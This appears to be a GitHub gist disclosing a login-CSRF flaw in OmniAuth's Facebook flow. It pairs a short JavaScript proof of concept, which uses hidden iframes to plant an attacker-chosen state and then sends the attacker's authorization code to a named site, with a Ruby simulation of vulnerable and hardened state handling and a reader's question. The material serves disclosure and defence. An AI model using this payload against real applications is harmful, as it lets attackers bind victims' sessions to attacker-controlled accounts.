@homakov /gist:3673012
omniauth vulnerability #2
We just put our state in the user's session, then abort loading the page to avoid deleting our value, and then use OUR code with OUR state. CSRF again.

// Step 1: start the provider flow in a hidden frame with an attacker-chosen
// state, so the application stores state=123 in the victim's session.
document.write('<iframe src="https://obaz.com/users/auth/facebook?state=123" name=im></iframe>');

setTimeout(function(){
  // Step 2: stop the frame before the provider can redirect back, so no
  // legitimate callback runs and the pre-seeded state stays in the session.
  im.stop();
  // Step 3: load the callback with the same state and the attacker's own
  // authorization code; the state check passes because both values are ours.
  document.write("<iframe src='https://obaz.com/users/auth/facebook/callback?state=123&code=AQCR436EWAPR7or-wB61HtzW1F2O1MvhdRregxe7f4dwkFZIIioePO1HtMTPK2HLPKmq85F1Fl9QhgOISHu6UDhaxNJeZ3fVm2K_Sr9VbJHbiwhFdGpLxPefKMY6fiuaS9DgMYSb-0huKcMsTd1bP13l9nWgKgHmIL2Qh6imIXV0PqRboAgJu4Txk0obe6RPerZSrbwsHHTteUwV2eg_L19o'></iframe>");
}, 300);
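The root cause the gist relies on is that the application lets the browser choose the state it stores in the session. The following Ruby sketch is an added example, not code from the gist or from OmniAuth: it models a request phase and a callback phase against a plain hash standing in for the session, with one request-phase variant that honours a client-supplied state (the behaviour the gist exploits) and one that ignores it. The function names, the session key `oauth.state`, and the `*_PLACEHOLDER` authorization codes are all constructed for the example.

```ruby
require 'securerandom'

# --- request phase: the app picks the state it will send to the provider ---

# Vulnerable variant: a ?state=... value supplied by the browser is accepted and
# stored in the session. Anyone who can make the victim's browser load this URL
# (an iframe is enough) decides what the session will later be checked against.
def request_phase_vulnerable(session, params)
  state = params['state'] || SecureRandom.hex(24)
  session['oauth.state'] = state
  state
end

# Hardened variant: the state is always generated server-side from a CSPRNG and
# the inbound parameter is ignored, so the session value stays unguessable even
# when the attacker triggered the request.
def request_phase_hardened(session, _params)
  state = SecureRandom.hex(24)
  session['oauth.state'] = state
  state
end

# --- callback phase, identical for both variants ---

# Constant-time comparison so the check does not leak how many leading bytes
# matched (Rack::Utils.secure_compare does the same; re-implemented here so the
# snippet has no dependencies).
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  expected = a.unpack('C*')
  diff = 0
  b.each_byte { |byte| diff |= byte ^ expected.shift }
  diff.zero?
end

# The state is removed from the session before it is checked, so it can be used
# exactly once; a missing or mismatching value rejects the callback.
def callback_phase(session, params)
  expected = session.delete('oauth.state')
  return :rejected unless expected && params['state']
  return :rejected unless secure_compare(expected, params['state'])
  :accepted
end

# --- scenarios ---

# The scenario from the gist: the victim's browser is forced through the request
# phase with state=123, the frame is stopped before a real callback can consume
# the value, then the attacker's own callback arrives with state=123 and the
# attacker's authorization code (a constructed placeholder here).
def simulate_attack(request_phase)
  victim_session = {}
  request_phase.call(victim_session, { 'state' => '123' })
  callback_phase(victim_session, { 'state' => '123', 'code' => 'ATTACKER_CODE_PLACEHOLDER' })
end

# A normal login: the state the app generated is echoed back by the provider.
def simulate_legitimate_login(request_phase)
  session = {}
  state = request_phase.call(session, {})
  callback_phase(session, { 'state' => state, 'code' => 'PROVIDER_CODE_PLACEHOLDER' })
end

# Replaying a callback must fail, because the first callback consumed the state.
def simulate_replay(request_phase)
  session = {}
  state = request_phase.call(session, {})
  params = { 'state' => state, 'code' => 'PROVIDER_CODE_PLACEHOLDER' }
  first = callback_phase(session, params)
  [first, callback_phase(session, params)]
end

if $PROGRAM_NAME == __FILE__
  puts "vulnerable request phase, forced state: #{simulate_attack(method(:request_phase_vulnerable))}"
  puts "hardened request phase, forced state:   #{simulate_attack(method(:request_phase_hardened))}"
end
```

Run against the vulnerable request phase, the forced callback is accepted, because the only thing the callback can verify is that the session and the URL agree, and the attacker wrote both. With the hardened request phase the same sequence is rejected: the session holds a value the attacker never saw. The single-use deletion in `callback_phase` is what the gist's `im.stop()` works around, which is why it is necessary but not sufficient on its own.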
@weyus

Is this saying that the presence of the state parameter creates an opportunity for CSRF? Can you explain the gist a little more?

Does the presence of the state parameter make any difference in this scenario?

My understanding is that the purpose of the state parameter itself is to help prevent CSRF (see: http://instagram.com/developer/authentication/), which states:

"Note: You may provide an optional state parameter to carry through any server-specific state you need to, for example, protect against CSRF issues."
